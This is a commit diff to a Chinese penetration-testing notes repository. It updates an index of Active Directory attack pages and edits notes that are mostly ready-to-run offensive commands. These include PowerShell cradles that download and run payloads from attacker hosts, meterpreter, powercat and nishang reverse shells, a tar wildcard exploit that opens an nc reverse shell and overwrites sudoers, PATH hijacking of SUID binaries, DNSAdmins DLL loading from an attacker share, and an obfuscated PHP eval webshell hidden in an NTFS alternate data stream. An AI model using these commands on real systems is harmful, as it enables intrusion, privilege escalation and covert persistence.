update active directory hacking

Author: xiaoy-sec

wiki/README.md

@@ -387,6 +387,10 @@
   - [攻击MSSQL数据库](https://github.com/xiaoy-sec/Pentest_Note/blob/master/wiki/横向移动/攻击MSSQL数据库.md)
   - [攻击MySQL数据库](https://github.com/xiaoy-sec/Pentest_Note/blob/master/wiki/横向移动/攻击MySQL数据库.md)
   - [账户委派](https://github.com/xiaoy-sec/Pentest_Note/blob/master/wiki/横向移动/账户委派.md)
+  - [kerberos约束委派](https://github.com/xiaoy-sec/Pentest_Note/blob/master/wiki/横向移动/kerberos约束委派.md)
+  - [kerberos无约束委派](https://github.com/xiaoy-sec/Pentest_Note/blob/master/wiki/横向移动/kerberos无约束委派.md)
+  - [kerberos青铜比特攻击CVE-2020-17049](https://github.com/xiaoy-sec/Pentest_Note/blob/master/wiki/横向移动/kerberos青铜比特攻击CVE-2020-17049.md)
+  - [基于kerberos资源的约束委派](https://github.com/xiaoy-sec/Pentest_Note/blob/master/wiki/横向移动/基于kerberos资源的约束委派.md)
   - [CVE-2019-0708](https://github.com/xiaoy-sec/Pentest_Note/blob/master/wiki/横向移动/CVE-2019-0708.md)
   - [获取保存的RDP密码](https://github.com/xiaoy-sec/Pentest_Note/blob/master/wiki/横向移动/获取保存的RDP密码.md)
   - [GPP-Password](https://github.com/xiaoy-sec/Pentest_Note/blob/master/wiki/横向移动/GPP-Password.md)
@@ -412,7 +416,38 @@
   - [资源受限委派](https://github.com/xiaoy-sec/Pentest_Note/blob/master/wiki/横向移动/资源受限委派.md)
   - [WinRM无文件执行](https://github.com/xiaoy-sec/Pentest_Note/blob/master/wiki/横向移动/WinRM无文件执行.md)
   - [组策略对象GPO](https://github.com/xiaoy-sec/Pentest_Note/blob/master/wiki/横向移动/组策略对象GPO.md)
-
+  - [危险的内置组使用](https://github.com/xiaoy-sec/Pentest_Note/blob/master/wiki/横向移动/危险的内置组使用.md)
+  - [ActiveDirectory证书服务](https://github.com/xiaoy-sec/Pentest_Note/blob/master/wiki/横向移动/ActiveDirectory证书服务/README.md)
+    - [查找证书服务器](https://github.com/xiaoy-sec/Pentest_Note/blob/master/wiki/横向移动/ActiveDirectory证书服务/查找证书服务器.md)
+    - [ESC1-配置错误的证书模板](https://github.com/xiaoy-sec/Pentest_Note/blob/master/wiki/横向移动/ActiveDirectory证书服务/ESC1-配置错误的证书模板.md)
+    - [ESC2-配置错误的证书模板](https://github.com/xiaoy-sec/Pentest_Note/blob/master/wiki/横向移动/ActiveDirectory证书服务/ESC2-配置错误的证书模板.md)
+    - [ESC3-配置错误的注册代理模板](https://github.com/xiaoy-sec/Pentest_Note/blob/master/wiki/横向移动/ActiveDirectory证书服务/ESC3-配置错误的注册代理模板.md)
+    - [ESC4-访问控制漏洞](https://github.com/xiaoy-sec/Pentest_Note/blob/master/wiki/横向移动/ActiveDirectory证书服务/ESC4-访问控制漏洞.md)
+    - [ESC6-EDITF_ATTRIBUTESUBJECTALTNAME2](https://github.com/xiaoy-sec/Pentest_Note/blob/master/wiki/横向移动/ActiveDirectory证书服务/ESC6-EDITF_ATTRIBUTESUBJECTALTNAME2.md)
+    - [ESC7-易受攻击的证书颁发机构访问控制](https://github.com/xiaoy-sec/Pentest_Note/blob/master/wiki/横向移动/ActiveDirectory证书服务/ESC7-易受攻击的证书颁发机构访问控制.md)
+    - [ESC8-ADCS中继攻击](https://github.com/xiaoy-sec/Pentest_Note/blob/master/wiki/横向移动/ActiveDirectory证书服务/ESC8-ADCS中继攻击.md)
+    - [经过认证的CVE-2022-26923](https://github.com/xiaoy-sec/Pentest_Note/blob/master/wiki/横向移动/ActiveDirectory证书服务/经过认证的CVE-2022-26923.md)
+    - [Pass-The-Certificate](https://github.com/xiaoy-sec/Pentest_Note/blob/master/wiki/横向移动/ActiveDirectory证书服务/Pass-The-Certificate.md)
+  - [ActiveDirectory的ACL和ACE](https://github.com/xiaoy-sec/Pentest_Note/blob/master/wiki/横向移动/ActiveDirectory的ACL和ACE/README.md)
+    - [GenericAll](https://github.com/xiaoy-sec/Pentest_Note/blob/master/wiki/横向移动/ActiveDirectory的ACL和ACE/GenericAll.md)
+    - [GenericWrite](https://github.com/xiaoy-sec/Pentest_Note/blob/master/wiki/横向移动/ActiveDirectory的ACL和ACE/GenericWrite.md)
+    - [WriteDACL](https://github.com/xiaoy-sec/Pentest_Note/blob/master/wiki/横向移动/ActiveDirectory的ACL和ACE/WriteDACL.md)
+    - [WriteOwner](https://github.com/xiaoy-sec/Pentest_Note/blob/master/wiki/横向移动/ActiveDirectory的ACL和ACE/WriteOwner.md)
+    - [读取GMSA密码](https://github.com/xiaoy-sec/Pentest_Note/blob/master/wiki/横向移动/ActiveDirectory的ACL和ACE/读取GMSA密码.md)
+    - [读取LAPS密码](https://github.com/xiaoy-sec/Pentest_Note/blob/master/wiki/横向移动/ActiveDirectory的ACL和ACE/读取LAPS密码.md)
+    - [强制更改密码](https://github.com/xiaoy-sec/Pentest_Note/blob/master/wiki/横向移动/ActiveDirectory的ACL和ACE/强制更改密码.md)
+  - [DCOM-Exploitation](https://github.com/xiaoy-sec/Pentest_Note/blob/master/wiki/横向移动/DCOM-Exploitation/README.md)
+    - [DCOM](https://github.com/xiaoy-sec/Pentest_Note/blob/master/wiki/横向移动/DCOM-Exploitation/DCOM.md)
+    - [通过MMC应用程序类进行DCOM](https://github.com/xiaoy-sec/Pentest_Note/blob/master/wiki/横向移动/DCOM-Exploitation/通过MMC应用程序类进行DCOM.md)
+    - [通过Office进行DCOM](https://github.com/xiaoy-sec/Pentest_Note/blob/master/wiki/横向移动/DCOM-Exploitation/通过Office进行DCOM.md)
+    - [通过ShellExecute进行DCOM](https://github.com/xiaoy-sec/Pentest_Note/blob/master/wiki/横向移动/DCOM-Exploitation/通过ShellExecute进行DCOM.md)
+    - [通过ShellBrowserWindow进行DCOM](https://github.com/xiaoy-sec/Pentest_Note/blob/master/wiki/横向移动/DCOM-Exploitation/通过ShellBrowserWindow进行DCOM.md)
+  - [域与域](https://github.com/xiaoy-sec/Pentest_Note/blob/master/wiki/横向移动/域与域.md)
+  - [SCCM部署](https://github.com/xiaoy-sec/Pentest_Note/blob/master/wiki/横向移动/SCCM部署.md)
+  - [WSUS部署](https://github.com/xiaoy-sec/Pentest_Note/blob/master/wiki/横向移动/WSUS部署.md)
+  - [PrivExchange攻击](https://github.com/xiaoy-sec/Pentest_Note/blob/master/wiki/横向移动/PrivExchange攻击.md)
+  - [RODC-只读域控制器入侵](https://github.com/xiaoy-sec/Pentest_Note/blob/master/wiki/横向移动/RODC-只读域控制器入侵.md)
+  - [PXE启动映像攻击](https://github.com/xiaoy-sec/Pentest_Note/blob/master/wiki/横向移动/PXE启动映像攻击.md)
 - [权限维持](https://github.com/xiaoy-sec/Pentest_Note/blob/master/wiki/权限维持/README.md)
   - [Windows](https://github.com/xiaoy-sec/Pentest_Note/blob/master/wiki/权限维持/Windows/README.md)
     - [Invoke-ADSBackdoor](https://github.com/xiaoy-sec/Pentest_Note/blob/master/wiki/权限维持/Windows/Invoke-ADSBackdoor.md)

wiki/内网和域/命令与控制/Powershell.md

@@ -1,70 +1,70 @@
   #### MSF+Powershell
-	反弹MSF
-	靶机
+	反弹MSF
+	靶机
 	PS >IEX(New-Object Net.WebClient).DownloadString('http://192.168.0.100/powersploit/CodeExecution/Invoke-Shellcode.ps1') 
 	PS >Invoke-Shellcode -payload windows/meterpreter/reverse_http -lhost 192.168.0.100 -lport 6666 -force
-	攻击机：
+	攻击机：
 	>use exploit/multi/handler
 	>set payload windows/x64/meterpreter/reverse_ https
 	>run
-	或
+	或
 	>msfvenom -p windows/x64/meterpreter/reverse_https LHOST=192.168.0.100 LPORT=4444 -f powershell -o /var/www/html/ps
 	>IEX(New-Object Net.WebClient).DownloadString("http://192.168.0.100/powersploit/CodeExecution/Invoke-Shellcode.ps1")
 	>IEX(New-Object Net.WebClient).DownloadString("http://192.168.0.100/ps")
 	>Invoke-Shellcode -Shellcode ($buf)
-	或
+	或
 	>msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=192.168.0.100 LPORT=4444 -f psh-reflection >/var/www/html/a.ps1
 	>powershell -nop -w hidden -c "IEX(New-Object Net.WebClient).DownloadString('http://192.168.0.101/a.ps1')"
   #### Powercat
 	>powershell IEX (New-Object System.Net.Webclient).DownloadString('https://raw.githubusercontent.com/besimorhino/powercat/master/powercat.ps1')
-	正向连接
-	靶机:powercat -l -p 8080 -e cmd.exe –v
-	攻击机:nc 192.168.0.1 8080 –vv
-	反向连接：
-	攻击机：nc –l –p 8080 –vv
-	靶机:powercat –c 192.168.0.1 –p 8080 –v –e cmd.exe
-	远程执行
+	正向连接
+	靶机:powercat -l -p 8080 -e cmd.exe –v
+	攻击机:nc 192.168.0.1 8080 –vv
+	反向连接：
+	攻击机：nc –l –p 8080 –vv
+	靶机:powercat –c 192.168.0.1 –p 8080 –v –e cmd.exe
+	远程执行
 	>powershell -nop -w hidden -ep bypass "IEX (New-Object System.Net.Webclient).DownloadString('http://192.168.0.107/ps/powercat/powercat.ps1'); powercat -c 192.168.0.107 -p 12345 -v -e cmd.exe"
-	正向连接
-	靶机:powercat -l -p 8080 -e cmd.exe -v
-	攻击机:nc 192.168.0.1 8080 -vv
-	反向连接：
-	攻击机：nc -l -p 8080 -vv
-	靶机:powercat -c 192.168.0.1 -p 8080 -v -e cmd.exe
+	正向连接
+	靶机:powercat -l -p 8080 -e cmd.exe -v
+	攻击机:nc 192.168.0.1 8080 -vv
+	反向连接：
+	攻击机：nc -l -p 8080 -vv
+	靶机:powercat -c 192.168.0.1 -p 8080 -v -e cmd.exe
 ![image](https://raw.githubusercontent.com/xiaoy-sec/Pentest_Note/master/img/207.png)
   #### Nishang
   ##### Bind shell
-	靶机：
+	靶机：
 	>powershell -nop -w hidden -ep bypass "IEX (New-Object Net.WebClient).DownloadString('http://192.168.0.107/ps/nishang/Shells/Invoke-PowerShellTcp.ps1');Invoke-PowerShellTcp -Bind -Port 12138"
-	攻击机：
-	>nc 靶机IP 12138
-  ##### 反向shell
-	攻击机：
+	攻击机：
+	>nc 靶机IP 12138
+  ##### 反向shell
+	攻击机：
 	>nc -vnlp 9999
-	靶机：
-	>powershell -nop -w hidden -ep bypass "IEX (New-Object Net.WebClient).DownloadString('http://192.168.0.107/ps/nishang/Shells/Invoke-PowerShellTcp.ps1');Invoke-PowerShellTcp -Reverse -IPAddress 攻击机IP -port 9999"
-  ##### UDP反向shell
-	攻击机：
+	靶机：
+	>powershell -nop -w hidden -ep bypass "IEX (New-Object Net.WebClient).DownloadString('http://192.168.0.107/ps/nishang/Shells/Invoke-PowerShellTcp.ps1');Invoke-PowerShellTcp -Reverse -IPAddress 攻击机IP -port 9999"
+  ##### UDP反向shell
+	攻击机：
 	>nc -lvup 12138
-	靶机：
-	>powershell -nop -w hidden -ep bypass "IEX (New-Object Net.WebClient).DownloadString('http://192.168.0.107/ps/nishang/Shells/Invoke-PowerShellTcp.ps1');Invoke-PowerShellTcp -Reverse -IPAddress 攻击机IP -port 12138"
+	靶机：
+	>powershell -nop -w hidden -ep bypass "IEX (New-Object Net.WebClient).DownloadString('http://192.168.0.107/ps/nishang/Shells/Invoke-PowerShellTcp.ps1');Invoke-PowerShellTcp -Reverse -IPAddress 攻击机IP -port 12138"
   ##### HTTPS
-	攻击机：
-	>powershell -nop -ep bypass "IEX (New-Object Net.WebClient).DownloadString('http://192.168.0.107/ps/nishang/Shells/Invoke-PoshRatHttps.ps1'); Invoke-PoshRatHttps -IPAddress 192.168.0.98 -Port 8080 -SSLPort 443"  IP地址是本机IP
+	攻击机：
+	>powershell -nop -ep bypass "IEX (New-Object Net.WebClient).DownloadString('http://192.168.0.107/ps/nishang/Shells/Invoke-PoshRatHttps.ps1'); Invoke-PoshRatHttps -IPAddress 192.168.0.98 -Port 8080 -SSLPort 443"  IP地址是本机IP
 ![image](https://raw.githubusercontent.com/xiaoy-sec/Pentest_Note/master/img/208.png)
 
-	靶机：
+	靶机：
 	>powershell -w hidden -nop -ep bypass "IEX (New-Object Net.WebClient).DownloadString('http://192.168.0.98:8080/connect')
 ![image](https://raw.githubusercontent.com/xiaoy-sec/Pentest_Note/master/img/209.png)
   ##### ICMP
-	攻击机IP:108
-	靶机IP:100
+	攻击机IP:108
+	靶机IP:100
 	https://github.com/inquisb/icmpsh
-	靶机执行
+	靶机执行
 	>powershell -nop -ep bypass "IEX (New-Object Net.WebClient).DownloadString('http://192.168.0.108/ps/nishang/Shells/Invoke-PowerShellIcmp.ps1');Invoke-PowerShellIcmp 192.168.0.108
 ![image](https://raw.githubusercontent.com/xiaoy-sec/Pentest_Note/master/img/210.png)
 
-	攻击机执行，开启相应ICMP ECHO请求
+	攻击机执行，开启相应ICMP ECHO请求
 	>sysctl -w net.ipv4.icmp_echo_ignore_all=1
 	>./icmpsh_m.py 192.168.0.108 192.168.0.100
 ![image](https://raw.githubusercontent.com/xiaoy-sec/Pentest_Note/master/img/211.png)

wiki/权限提升/Linux提权/Lxd提权.md

@@ -1,11 +1,11 @@
-	查看文件是否存在
+	查看文件是否存在
 	>which lxd & >which lxc
-	攻击机
+	攻击机
 	>git clone https://github.com/saghul/lxd-alpine-builder.git
 	>cd lxd-alpine-builder
 	>./build-alpine
-	搞个web服务提供下载>python -m SimpleHTTPServer
-	靶机下载
+	搞个web服务提供下载>python -m SimpleHTTPServer
+	靶机下载
 	>wget http://192.168.1.107:8000/apline-v3.10-x86_64-20191008_1227.tar.gz
 	>lxc image import ./alpine-v3.10-x86_64-20191008_1227.tar.gz --alias myimage
 	>lxc image list

wiki/权限提升/Linux提权/环境变量提权.md

@@ -1,5 +1,5 @@
-##### 第一种
-	假设存在一个脚本代码为
+##### 第一种
+	假设存在一个脚本代码为
 ```c
 	#include<unistd.h>
 	void main()
@@ -10,13 +10,13 @@
 	}
 ```
 	
-	编译
+	编译
 	>gcc demo.c -o shell
 	>chmod u+s shell
-	执行./shell  回显ps命令
-	提权
+	执行./shell  回显ps命令
+	提权
 	find / -perm -u=s -type f 2>/dev/null
-	存在脚本/home/name/script/shell
+	存在脚本/home/name/script/shell
 	>cd /tmp
 	>echo "/bin/bash" > ps
 	>chmod 777 ps
@@ -25,20 +25,20 @@
 	>cd /home/raj/script
 	>./shell
 	>whoami
-	或使用copy命令
+	或使用copy命令
 	>cd /home/raj/script/
 	>cp /bin/sh /tmp/ps
 	>echo $PATH
 	>export PATH=/tmp:$PATH
 	>./shell
 	>whoami
-	或使用ln命令
+	或使用ln命令
 	>ln -s /bin/sh ps
 	>export PATH=.:$PATH
 	>./shell
 	>id
-##### 第二种
-	假设存在一个脚本代码为
+##### 第二种
+	假设存在一个脚本代码为
 ```c
 	#include<unistd.h>
 	void main()
@@ -49,12 +49,12 @@
 	}
 ```
 
-	编译
+	编译
 	>gcc test.c -o shell2
 	>chmod u+s shell2
-	提权
+	提权
 	find / -perm -u=s -type f 2>/dev/null
-	存在脚本/home/name/script/shell2
+	存在脚本/home/name/script/shell2
 	>cd /tmp
 	>echo "/bin/bash" > id
 	>chmod 777 id
@@ -63,8 +63,8 @@
 	>cd /home/raj/script
 	>./shell2
 	>whoami
-##### 第三种
-	假设存在一个脚本代码为
+##### 第三种
+	假设存在一个脚本代码为
 ```c
 	#include<unistd.h>
 	void main()
@@ -75,21 +75,21 @@
 	}
 ```
 
-	编译后提权
+	编译后提权
 	find / -perm -u=s -type f 2>/dev/null
-	存在脚本/home/name/script/shell3
+	存在脚本/home/name/script/shell3
 	>cd /tmp
 	>vi cat
-	内容为/bin/bash
+	内容为/bin/bash
 	>chmod 777 cat
 	>ls -al cat
 	>echo $PATH
 	>export PATH=/tmp:$PATH
 	>cd /home/raj/script
 	>./shell3
 	>whoami
-##### 第四种
-	假设存在一个脚本代码为
+##### 第四种
+	假设存在一个脚本代码为
 ```c
 	#include<unistd.h>
 	void main()
@@ -100,9 +100,9 @@
 	}
 ```
 
-	编译后提权
+	编译后提权
 	find / -perm -u=s -type f 2>/dev/null
-	存在脚本/home/name/script/shell4
+	存在脚本/home/name/script/shell4
 	>cd /tmp
 	>vi cat
 	>chmod 777 cat

wiki/权限提升/Linux提权/通配符提权.md

@@ -1,23 +1,23 @@
-	低权限登录
-	查看cron
+	低权限登录
+	查看cron
 	>cat /etc/crontab
-	存在一个定时压缩目录的任务
-	生成反向shell
+	存在一个定时压缩目录的任务
+	生成反向shell
 	>msfvenom -p cmd/unix/reverse_netcat lhost=192.168.1.102 lport=8888 R
-	再监听
+	再监听
 	>nc -lvp 8888
-	靶机执行
+	靶机执行
 	>echo "mkfifo /tmp/lhennp; nc 192.168.1.102 8888 0</tmp/lhennp | /bin/sh >/tmp/lhennp 2>&1; rm /tmp/lhennp" > shell.sh
 	>echo "" > "--checkpoint-action=exec=sh shell.sh"
 	>echo "" > --checkpoint=1
 	>tar cf archive.tar *
-	即可返回shell
-	或使用sudoer
+	即可返回shell
+	或使用sudoer
 	>echo 'echo "ignite ALL=(root) NOPASSWD: ALL" > /etc/sudoers' > demo.sh
 	>echo "" > "--checkpoint-action=exec=sh demo.sh"
 	>echo "" > --checkpoint=1
 	>tar cf archive.tar *
-	或suid
+	或suid
 	>echo "chmod u+s /usr/bin/find" > test.sh
 	>echo "" > "--checkpoint-action=exec=sh test.sh"
 	>echo "" > --checkpoint=1

wiki/权限提升/Windows提权/DNS组到DomainAdmin.md

@@ -1,11 +1,18 @@
-	>whoami /groups 可以看到当前用户是DnsAdmins组
-	>msfvenom -p windows/x64/shell_reverse_tcp LHOST=192.168.0.1 LPORT=11111 -f dll -o 1.dll
-	使用impacket中的smbserver.py托管root目录
-	>smbserver.py -smb2support raj /root
-	靶机通过dnscmd.exe将DLL传递到内存
-	>dnscmd.exe /config /serverlevelplugindll \\192.168.0.1\raj\1.dll
-	攻击机监听
-	>nc -lvp 11111
-	靶机重启dns
-	>sc stop dns
-	>sc start dns
+	DNSAdmins 组的成员可以加载具有 dns.exe (SYSTEM) 权限的任意 DLL。
+	需要权限才能重新启动 DNS 服务。
+	枚举 DNSAdmins 组的成员
+	>Get-NetGroupMember -GroupName "DNSAdmins"
+	>Get-ADGroupMember -Identity DNSAdmins
+	更改 DNS 服务加载的 dll
+	使用RSAT
+	>dnscmd <servername> /config /serverlevelplugindll \\attacker_IP\dll\mimilib.dll
+	>dnscmd 10.10.10.11 /config /serverlevelplugindll \\10.10.10.10\exploit\privesc.dll
+	使用DNSServer模块
+	$dnsettings = Get-DnsServerSetting -ComputerName <servername> -Verbose -All
+	$dnsettings.ServerLevelPluginDll = "\attacker_IP\dll\mimilib.dll"
+	Set-DnsServerSetting -InputObject $dnsettings -ComputerName <servername> -Verbose
+	检查上一条命令是否成功
+	>Get-ItemProperty HKLM:\SYSTEM\CurrentControlSet\Services\DNS\Parameters\ -Name ServerLevelPluginDll
+	重新启动 DNS
+	>sc \\dc01 stop dns
+	>sc \\dc01 start dns

wiki/权限维持/Windows/ADS隐藏webshell.md

@@ -1,21 +1,21 @@
-	指定宿主文件，index.php是网页正常文件
+	指定宿主文件，index.php是网页正常文件
 	>echo ^<?php @eval($_POST['chopper']);?^> > index.php:hidden.jpg
-	<?php include(‘index.php:hidden.jpg’)?>
+	<?php include(‘index.php:hidden.jpg’)?>
 	<?php 
-	$a="696E6465782E7068703"."A68696464656E2E6A7067";#hex编码
+	$a="696E6465782E7068703"."A68696464656E2E6A7067";#hex编码
 	$b="a";
 	include(PACK('H*',$$b))
 	?>
 	>echo 9527 > 1.txt:flag.txt
 	>notepad 1.txt:flag.txt
-	或不指定宿主文件
+	或不指定宿主文件
 	>echo hide > :key.txt
 	>cd ../
 	>notepad test:key.txt
-	上传处绕过
-|上传的文件名   |服务器表面现象   |生成的文件内容   |
+	上传处绕过
+|上传的文件名   |服务器表面现象   |生成的文件内容   |
 | ------------ | ------------ | ------------ |
-|test.php:a.jpg   |生成test.php   |空   |
-|test.php::$DATA   | 生成test.php  |<?php phpinfo();?>   |
-|test.php::$INDEX_ALLOCATION   |生成test.php文件夹   |\   |
-|test.php::$DATA\0.jpg   |生成0.jpg   |<?php phpinfo();?>   |
+|test.php:a.jpg   |生成test.php   |空   |
+|test.php::$DATA   | 生成test.php  |<?php phpinfo();?>   |
+|test.php::$INDEX_ALLOCATION   |生成test.php文件夹   |\   |
+|test.php::$DATA\0.jpg   |生成0.jpg   |<?php phpinfo();?>   |